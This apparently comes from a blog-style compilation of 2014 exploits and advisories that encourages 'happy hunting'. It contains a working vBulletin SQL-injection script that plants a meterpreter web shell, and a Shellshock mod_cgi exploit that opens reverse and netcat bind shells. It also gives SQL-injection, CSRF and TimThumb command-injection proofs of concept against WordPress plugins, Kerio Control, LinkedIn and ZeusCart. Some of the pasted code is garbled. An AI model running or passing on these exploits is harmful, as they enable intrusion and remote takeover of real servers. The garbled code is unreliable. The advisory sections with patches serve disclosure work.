1. vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server.
2. This vulnerability founded by oststrom. Here the exploit code.

3. #!/usr/bin/env python
   # -*- coding: utf-8 -*-
   '''
   @author: tintinweb 0x721427D8
   '''
   import urllib2, cookielib, urllib, json, hashlib class Exploit(object):
   
   baseurl = None
   cookies = None
   
   def __init__(self,baseurl,params, debuglevel=1):
   self.cookies = cookielib.LWPCookieJar()
   handlers = [
   urllib2.HTTPHandler(debuglevel=debuglevel),
   urllib2.HTTPSHandler(debuglevel=debuglevel),
   urllib2.HTTPCookieProcessor(self.cookies)
   ]
   self.browser = urllib2.build_opener(*handlers)
   self.baseurl=baseurl
   self.params = params
   
   def call(self,path="",data={}):
   assert(isinstance(data,dict))
   data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data)
   req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req)
   
   def call_json(self,path=None,data={}):
   try:
   x=self.call(path,data).read()
   print "raw_response", x
   resp = json.loads(x)
   except urllib2.HTTPError, he:
   resp = he.read()
   return resp def vb_init_api(self):
   params = {'api_m':'api_init'}
   params.update(self.params)
   data = self.call_json("?%s"%(urllib.urlencode(params)))
   self.session = data
   return data
   
   def vb_call(self, params):
   api_sig = self._vb_build_api_sig(params)
   req_params = self._vb_build_regstring(api_sig)
   params.update(req_params)
   data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
   if not isinstance(data, dict):
   return data
   if 'errormessage' in data['response'].keys():
   raise Exception(data)
   return data def _ksort(self, d):
   ret = []
   for key, value in [(k,d[k]) for k in sorted(d.keys())]:
   ret.append( "%s=%s"%(key,value))
   return "&".join(ret) def _ksort_urlencode(self, d):
   ret = []
   for key, value in [(k,d[k]) for k in sorted(d.keys())]:
   ret.append( urllib.urlencode({key:value}))
   return "&".join(ret) def _vb_build_api_sig(self, params):
   apikey = self.params['apikey']
   login_string = self._ksort_urlencode(params)
   access_token = str(self.session['apiaccesstoken'])
   client_id = str(self.session['apiclientid'])
   secret = str(self.session['secret'])
   return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
   
   def _vb_build_regstring(self, api_sig):
   params = {
   'api_c':self.session['apiclientid'],
   'api_s':self.session['apiaccesstoken'],
   'api_sig':api_sig,
   'api_v':self.session['apiversion'],
   }
   return params
   if __name__=="__main__":
   TARGET = "http://192.168.220.131/vbb4/api.php"
   APIKEY = "4FAVcRDc"
   REMOTE_SHELL_PATH = "/var/www/myShell.php"
   TRIGGER_URL = "http://192.168.220.131/myShell.php"
   DEBUGLEVEL = 0 # 1 to enable request tracking
   ### 2. sqli - simple - write outfile
   print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
   params = {'clientname':'fancy_exploit_client',
   'clientversion':'1.0',
   'platformname':'exploit',
   'platformversion':'1.5',
   'uniqueid':'1234',
   'apikey':APIKEY}
   x = Exploit(baseurl=TARGET,params=params)
   
   vars = x.vb_init_api()
   print vars
   '''
   x.vb_call(params={'api_m':'breadcrumbs_create',
   'type':'t',
   #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
   'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
   })
   
   print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
   '''
   ### 3. sqli - put meterpreter shell and trigger it
   print "[ 3 ] - sqli - meterpreter shell + trigger"
   with open("./meterpreter_bind_tcp") as f:
   shell = f.read() shell = shell.replace("","") #cleanup tags
   shell = shell.encode("base64").replace("\n","") #encode payload
   shell = ""%shell # add decoderstub
   shell = "0x"+shell.encode("hex") # for mysql outfile
   
   
   x.vb_call(params={'api_m':'breadcrumbs_create',
   'type':'t',
   'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
   print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
   print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST= E"
   print "[ *] shell active ... waiting for it to die ..."
   print urllib2.urlopen(TRIGGER_URL)
   print "[ ] shell died!"
   print "-- quit --"

What si PayPal?
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet.

Well, a group of researcher called Vulnerability-Lab found a vulnerability in PayPal on iOS Mobile App.

What do you think when your hear PayPal bug? Yeah man! Money! :)

Check out the vulnerability here. Happy hunting!

Apache application mod_cgi is suffer for remote exploit (shellshock).
This vulnerability is found by Frederico Galatolo. The exploit is written in python.
Here is the code. Happy hunting!

#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
Credits:
Federico Galatolo 2014
"""
sys.exit(0)
def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)

args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass

######################

# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
#     Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);


$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it

#####################

source

Document Title: 
======================
Kerio Control <= 8.3.1 Boolean-based blind SQL Injection

Primary Informations:
======================

Product Name: Kerio Control
Software Description: Kerio Control brings together multiple capabilities 
 including a network firewall and router, intrusion detection and 
 prevention (IPS), gateway anti-virus, VPN and content filtering. These 
 comprehensive capabilities and unmatched deployment flexibility make 
 Kerio Control the ideal choice for small and mid-sized businesses.
Affected Version: Latest Version - 8.3.1 (released on 2014-05-20)
Vendor Website: http://kerio.com
Vulnerability Type: Boolean-based blind SQL Injection
Severity Level: Very High
Exploitation Technique: Remote
CVE-ID: CVE-2014-3857
Discovered By: Khashayar Fereidani
Main Reference: http://fereidani.com/articles/show/76_kerio_control_8_3_1_boolean_based_blind_sql_injection
Researcher's Websites: http://fereidani.com http://fereidani.ir
                       http://und3rfl0w.com http://ircrash.com
Researcher's Email: info [ a t ] fereidani [ d o t ] com


Technical Details:
=======================

Kerio Control suffers from a SQL Injection Vulnerability which can lead to gain users 
 sensitive informations like passwords , to use this vulnerability attacker need a 
 valid client username and password .

Vulnerable path: /print.php
Vulnerable variables: x_16 and x_17
HTTP Method: GET

Proof Of Concept:
=======================

Blind Test:
 TRUE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=1&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
 FALSE: https://[SERVER IP]:4081/print.php?x_w=overall&x_14=L1&x_15=stats&x_16=16221 AND 1=2&x_17=16221&x_18=-1&x_1b=&x_1a=&x_1l=[ VALID SESSION]&x_3k={%27x_fj%27%3A16220%2C+%27x_fk%27%3A+16220}&x_3l={%27x_fj%27%3A16222%2C+%27x_fk%27%3A+16222}&x_1c=&x_1e=-270&x_1f=-1&x_3m=0&x_11=overall&x_12=individual&x_13=x_2l
 

Solution:
========================
Valid escaping variables or type checking for integer


Exploit:
========================
Private


Vulnerability Disclosure Timeline:
==================================
May 30 2014 - Disclosure 
May 31 2014 - Received a CVE ID
May 31 2014 - Initial Report to Kerio Security Team
June 3 2014 - Support team replied fix is planned to be included in a future release
June 30 2014 - Patched
July 1 2014 - Publication


Khashayar Fereidani - http://fereidani.com

source

=============================================
Varutra Consulting Responsible Vulnerability Disclosure
- Vulnerability release date: November 20th, 2013
- Last revised:  May 4th, 2014
- Discovered by: Kishor Sonawane, Varutra Consulting
=============================================

1. VULNERABILITY
-------------------------
CSRF vulnerability in LinkedIn allowing remote attacker to delete any user’s recommendations

2. BACKGROUND
-------------------------
LinkedIn is a business-oriented Social networking service. One purpose of the sites is to allow registered users to maintain a list of contact details of people with whom they have some level of relationship, called Connections. Users can invite anyone (whether a site user or not) to become a connection. More details about LinkedIn can be found at http://en.wikipedia.org/wiki/LinkedIn

LinkedIn has already hit the 300 million users mark in 2014.  

3. DESCRIPTION
-------------------------
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. 

More info about CSRF:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

LinkedIn is vulnerable to CSRF attacks in the "one of the most important “Recommendations" functionality. LinkedIn allows rather facilitates a user to check recommendations given to other users. It will be shown as Recommendations for ‘UserName’     

An attacker can craft a request to delete the received recommendations and send it to the victim user.  The can be carried out with simply GET method. Attacker does not need a separate medium to send the malicious CSRF request but can use the LinkedIn mail feature only.  

4. PROOF OF CONCEPT
-------------------------------

An attacker can view his/her own recommendations and collect the following URL. 

Here is a typical request to delete a recommendation for a logged in user. 

https://www.linkedin.com/recommendations?wdr=&recID=123456789&goback=%2Enas_*1_*1_*1%2Eprs
The recID is a unique request Id generated by LinkedIn for each of the recommendation a user receives. 

In a simplest form the request will be

https://www.linkedin.com/recommendations?wdr=&recID=123456789 

This request Id can be obtained by web page source while viewing victim user’s recommendation. 

Steps to conduct the attack. 
I. Attacker visits victim uses LinkedIn account and view the recommendations received. 
II. Attacker goes to the page source on his own browser and gets the victim user’s recommendations request Id. 
III. Attacker craft the malicious CSRF request and sends it to the victim thorough LinkedIn mail
IV. On clicking the link victim’s recommendation will be withdrawn / deleted. 



5. BUSINESS IMPACT
-------------------------
An attacker can withdraw / delete any user’s any recommendation.

6. SYSTEMS AFFECTED
-------------------------
LinkedIn service

7. SOLUTION
-------------------------
Resolved by LinkedIn 

8. REFERENCES
-------------------------
http://www.linkedin.com
http://www.varutra.com

9. CREDITS
-------------------------
This vulnerability has been discovered by
Kishor (at) varutra (dot) com

10. REVISION HISTORY
-------------------------
November 20, 2013: Initial release
May 04, 2014: New update

11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise. Varutra accepts no responsibility for any damage caused by the use or misuse of this information.

12. ABOUT
-------------------------
Varutra Consulting is a pure play Information Security Consulting, Research and Training services firm, providing specialized security services for software, mobile devices and network.
Our Mission is to exceed client expectations, deliver quality security services in totality, covering People, Process and Technology asset of the client, with assurance of comprehensive coverage on every possible facet of information security related risk. 

13. FOLLOW US
-------------------------
You can follow Varutra Consulting, news and security advisories at:

http://varutra.com/news.php
https://www.facebook.com/pages/Varutra-Consulting/136105459900291

source

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
# Affected website : a lot Wordpress Themes, Plugins, 3rd party components
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : June 24, 2014
#
# Special Thanks to 2600 Thailand group
# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
TimThumb is a small php script for cropping, zooming and resizing web
images (jpg, png, gif). Perfect for use on blogs and other applications.
Developed for use in the WordPress theme Mimbo Pro, and since used in many
other WordPress themes.

http://www.binarymoon.co.uk/projects/timthumb/
https://code.google.com/p/timthumb/

The original project  WordThumb 1.07 also vulnerable (
https://code.google.com/p/wordthumb/)
They both shared exactly the same WebShot code! And there are several
projects that shipped with "timthumb.php", such as,
Wordpress Gallery Plugin
https://wordpress.org/plugins/wordpress-gallery-plugin/
IGIT Posts Slider Widget
http://wordpress.org/plugins/igit-posts-slider-widget/

All themes from http://themify.me/ contains vulnerable "wordthumb" in
"/themify/img.php".

[+] Exploit
============================================================
http://
/wp-content/themes//path/to/timthumb.php?webshot=1&src=http://
$()

** Note that OS commands payload MUST be within following character sets:
[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]

** Spaces, Pipe, GT sign are not allowed.
** This WebShot feature is DISABLED by default.
** CutyCapt and XVFB must be installed in constants.

[+] Proof-of-Concept
============================================================
There are couple techniques that can be used to bypass limited charsets but
I will use a shell variable $IFS insteads of space in this scenario.

PoC Environment:
Ubuntu 14.04 LTS
PHP 5.5.9
Wordpress 3.9.1
Themify Parallax Theme 1.5.2
WordThumb 1.07

Crafted Exploit:
http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)

GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
Host: longcatlab.local
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: woocommerce_recently_viewed=9%7C12%7C16;
wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685

HTTP/1.1 400 Bad Request
Date: Tue, 24 Jun 2014 07:20:48 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 3059
Connection: close
Content-Type: text/html

…
getimagesize
(  )

../img.php:388

A WordThumb error has occured

The following error(s) occured:

• The image being resized is not a valid gif, jpg or png.

Query String : webshot=1&src= http://longcatlab.local/$(touch$IFS/tmp/longcat)
WordThumb version : 1.07 Even it response with error messages but injected OS command has already been executed. $ ls /tmp/longcat -lha - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat [+] Vulnerability Analysis ============================================================ https://timthumb.googlecode.com/svn/trunk/timthumb.php Filename: timthumb.php if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true); if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt'); if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run'); ... timthumb::start(); ← start script ... public static function start(){ $tim = new timthumb(); ← create timthumb object, call __construct() ... $tim->run(); ... public function __construct(){ ... $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src" parameter … if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){ ... $this->isURL = true; ← prefix http/s result in isURL = true } ... protected function param($property, $default = ''){ if (isset ($_GET[$property])) { return $_GET[$property]; ... public function run(){ if($this->isURL){ ... if($this->param('webshot')){ ← HTTP GET "webshot" must submitted if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true ... $this->serveWebshot(); ← call webshot feature } else { ... protected function serveWebshot(){ ... if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt return $this->error("CutyCapt is not installed. $instr"); } if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb return $this->Error("Xvfb is not installed. $instr"); } ... $url = $this->src; if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid URL #LoL return $this->error("Invalid URL supplied."); } $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ← check valid URL as specified in RFC 3986 http://www.ietf.org/rfc/rfc3986.txt ... if(WEBSHOT_XVFB_RUNNING){ putenv('DISPLAY=:100.0'); $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } else { $command = "$xv --server-args=\"-screen 0, {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn --js-can-open-windows=off --url=\"$url\" --out-format=$format --out=$tempfile"; ← OS shell command injection } ... $out = `$command`; ← execute $command as shell command "PHP supports one execution operator: backticks (``). Note that these are not single-quotes! PHP will attempt to execute the contents of the backticks as a shell command." - http://www.php.net//manual/en/language.operators.execution.php "$url" is failed to escape "$()" in "$command" which is result in arbitrary code execution. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJTqTTsAAoJEB2kHapd1XMUy+cP/2ulCS1R8bXDda7R0PIfn9g9 FEECoLFV2tav1mSnWzuccvWA3vl3g8SUv/Y7GCKs824GVauhcestUUCpVKdCS3Gu 8ypfXOdecE+8ykoPhWfj2FWcKNpXTdCoMz8TugVkNM3+SS0akWYWqHeamXCqc3SK ZAiKfYQZ/jvVRRo8n/AAWYv5e8hZLmE6qiLGdTFrsH7VtkABIM5lc88o8qg6RU5x zg87khZxU+HtJdzN/gH0X6DL7+NJe6HOqun/+V8pm/5JEDUSpiWZIM1xpyIY6GqW UnU25UkSt1u+PnLX7KhqxUANU230BY9Ny7BIhp/q1iRvrKTIHK0WYEL3M96YOND2 +o2YJthfL7zm9k8XMoF2GQaaeqAnWjGmQC9Oo4ogF57X0Qzb1mwUd01db/R5fgPf 9IILnpWV2KLq57R3sdVesriEhTNW34Cqf77wS3P5Y5o2csbFL0OspulOVPM1uJTp S1sjuEL5gK3nJqzo7K2ihxdmm3o2hA9QXyn8GjTRu6ESZ26hSZgUEyC6P26yAt0Y IHuqML3y9guC720BkNoc1gZZNejgqGHUdc6EXzqO9njZFx5DPtDtf3M0f6uZfH/C knB9E32Lo9EFu2S/bjblgOQQUPNtKRNURpsGArx2eilPMdThGLZANFPIzvxYSlrz cnw4vN4tY8POL5FF7+gF =jAL1 -----END PGP SIGNATURE-----

source

On May 27th our research labs discovered a vulnerability (CVE-2014-3868)
in an e-commerce shopping cart application known as "ZeusCart".  The
same day,
we reported this vulnerability to mitre.org and the CVE was assigned.
We were
able to get in touch with the vendor with a confirmed response relatively
quickly (May 29).

We attempted to contact them again on June 4 and June 17.  They have not
since
responded.

Since then there have been multiple pushes and merges to the project's
master
branch on github; the security issue still has not been addressed
despite the
fix being a single, simple line of code.  This copy-paste fix could have
been
implemented extremely quickly and easily and the vendor has pushed many
updates since their notification. When initially disclosing this, we gave
them a time period of 14 days before we would publish it.  Because they
responded to us positively, we gave them extra time to fix it.  At this
point,
seeing that they continue to update the software past the 14 day window
without implementing a ten second fix leaves us little alternative to our
present course of action.

As per our Actionable Intelligence Must Beget Overzealous Timing (AIMBOT)
policy, this report is being released in the hopes that vendor
negligence and
potential incompetence may be appropriately addressed.  Responsible
disclosure
includes the responsibility to be transparent with consumers and the
responsibility to consumers to prevent them from being harmed.

Before we get into any specific vulnerability, we would like to
compliment this
vendor on their UI development.  The responsive HTML5 layout is
certainly an
excellent piece of code.

While the vendor has amazing interface developers, their database
architects
are as poor at databasing as their UI developers are good at interfacing.

Our initial analysis of the software in question, including
CVE-2014-3868 and
several other vulnerabilities follows below.  Weaponized exploit samples
for
this software will NOT be made available by ourselves, as weaponizing
exploits
affecting this type of application is contrary to the spirit of consumer
protection.  We will attempt to provide diffs for each thing we were
able to
easily patch at the end of this document; however this is not a
guarantee of
the future safety of this third-party-patched product.


--- CVE-2014-3868 ---
Assigned:
     27 May 2014 (Submitted to Vendor May 29)

Status:
     Vendor Ignored, see suggested fix below.

Classification:
     Blind SQL Injection

Exploit Complexity:
     Low

Severity:
     High

Description:
     Blind SQL injection vector exists in the current addtocart
functionality
     for the latest version of ZeusCart.

     Required information for attack to be successful:
     * valid product id
     * valid session ID

PoC:
     * Requires a valid sessionid and numeric product id.
     * The following bash commands causes the target page to sleep for 13
       seconds, while the expected inputs have a near-instant response time:

     # export SESSID="YOURSESSIONID, CHANGE THIS";
     # export PROD_ID="Numeric Product ID";
     # time curl -d "addtocart=${PROD_ID}" -b "PHPSESSID=${SESSID}" \
       "http://zeuscart_install/index.php?do=addtocart&prodid=${PROD_ID} and
        sleep(1)"

Suggested Action:
     At the top of CAddCart.php, line 32 (just after the comments and
before the
     definition of the class), add the following line of code:

        $_GET['prodid'] = abs((int)$_GET['prodid']);


--- Initial Analysis ---
     The first thing we noticed was that Zeuscart uses
Bin/Core/Assembler.php to
automatically iterate over each user input and use
"mysql_real_escape_string"
on everything.  While the comments call this "power security", it is not.
Inputs that are not wrapped in quotes are not in any way protected.  Two
better
ways to implement "power security" include using PDO with paramaterized
statements or an ORM that sanitizes inputs according to datatypes in the
information_schema database.

     We were able to identify a number of sql injection vulnerabilities
which
involved integer handling bugs.  The following functions are vulnerable to
the following parameters:

     classes/Core/CUserNewsLetter.php:
         * addNewsLetter()            : $_POST['subId']      (line 72)


     classes/Core/CAddCart.php:
         * addCartFromProductDetail() : $_GET['prodid']      (lines 238, 379)
         * addCartFromProductDetail() : $_POST['variations'] (line 273)


     Eventually we stopped actually looking CAddCart.php and just ran a
fancy
grep to see queries that had string concatenated inputs that weren't
wrapped in
quotes.  The results were kind of scary, so, for CAddCart.php we simply
made a
list of vulnerable integer inputs with some magical bash:
     * $_GET['prodid']
     * $_POST['variations']
     * $_POST['prodid'][$i]
     * $_POST['qty'][$i]
     * $_POST['qty']

     Our greps also returned a fairly large amount of other
vulnerabilities. The
following filenames and line numbers showed as vulnerable for one reason or
another, we are limiting the information here due to the severity of the
bugs.
     ./classes/Core/CAddCart.php:91
     ./classes/Core/CAddCart.php:115
     ./classes/Core/CAddCart.php:138
     ./classes/Core/CAddCart.php:238
     ./classes/Core/CAddCart.php:273
     ./classes/Core/CAddCart.php:734
     ./classes/Core/CAddCart.php:742
     ./classes/Core/CAddCart.php:749
     ./classes/Core/CAddCart.php:756
     ./classes/Core/CAddCart.php:757
     ./classes/Core/CAddCart.php:762
     ./classes/Core/CAddCart.php:783
     ./classes/Core/CAddCart.php:789
     ./classes/Core/CAddCart.php:905
     ./classes/Core/CUserNewsLetter.php:72
     ./classes/Display/DAddCart.php:277
     ./classes/Display/DAddCart.php:1146
     ./classes/Display/DAddCart.php:1161
     ./classes/Display/DAddCart.php:1326
     ./classes/Display/DAddCart.php:1341
     ./classes/Display/DUserAccount.php:1216

     Most major and obvious SQL injection bugs are fixed with our patch
to the
Assembler.php file; however we are not willing to vouch that there are
no SQL
injection vulnerabilities in our patched version.  This is only our initial
analysis and as such it is not complete.  This is simply what we were
able to
find and fix on our "first pass".


--- Our Patchset ---
While we have applied some best-effort hotfixes here, it is highly
recommended
to move to a software platform who's vendor takes security more
seriously until
the vendor officially patches these bugs amongst others.  Serious code
review
and standard enforcement is both lacking and needed by this vendor.

The diff is provided as follows:

   [root@temp Core]# diff Assembler.php Assembler_New.php
   47c47,73
   <
   ---
   >
   >                 if (isset($_POST['prodid'])) {
   >                     if (is_array($_POST['prodid'])) {
   >                         foreach ($_POST['prodid'] as $key => $value) {
   >                             $_POST['prodid'][$key] = abs((int)$value);
   >                         }
   >                     } else {
   >                         $_POST['prodid'] = abs((int)$_GET['prodid']);
   >                     }
   >                 }
   >
   >
   >                 if (isset($_POST['qty'])) {
   >                     if (is_array($_POST['qty'])) {
   >                         foreach ($_POST['qty'] as $key => $value) {
   >                             $_POST['qty'][$key] = abs((int)$value);
   >                         }
   >                     } else {
   >                         $_POST['qty'] = abs((int)$_GET['prodid']);
   >                     }
   >                 }
   >
   >                 if (isset($_POST['variations']))
$_POST['variations'] = abs((int)$_POST['variations']);
   >                 if (isset($_GET['prodid']))      $_GET['prodid']
   = abs((int)$_GET['prodid']);
   >                 if (isset($_POST['subId']))      $_POST['subId']
   = abs((int)$_POST['subId']);
   >
   >
   240c266
   < ?>
   \ No newline at end of file
   ---
   > ?>

Again, we would like to stress that this is NOT a guarantee of the
security of
this product.  This simply fixes the SQL injection vulnerabilities we
were able
to discover on our first glance.  If we were able to discover these
at-a-glance
then imagine what could potentially be in the wild.

Github pull request:https://github.com/ZeusCart/zeuscart/pull/23
Full Advisory:http://breaking.technology/advisories/CVE-2014-3868.txt

- Breaking Technology Staff

source

• We want to emphasize that this vulnerability only applies to users who are running Docker Engine in a non-recommended way by running untrusted applications with root privileges inside containers.
• We want to be clear that Docker Engine 1.0 is not vulnerable to this exploit. We strongly recommend that users upgrade Docker Engine to version 1.0 to address this issue and be on a fully supported, production-ready platform.

• Run Docker Engine with AppArmor or SELinux to provide containment;
• Map groups of mutually-trusted containers to separate machines; and
• Not run untrusted applications with root privileges.

Document Title:
===============
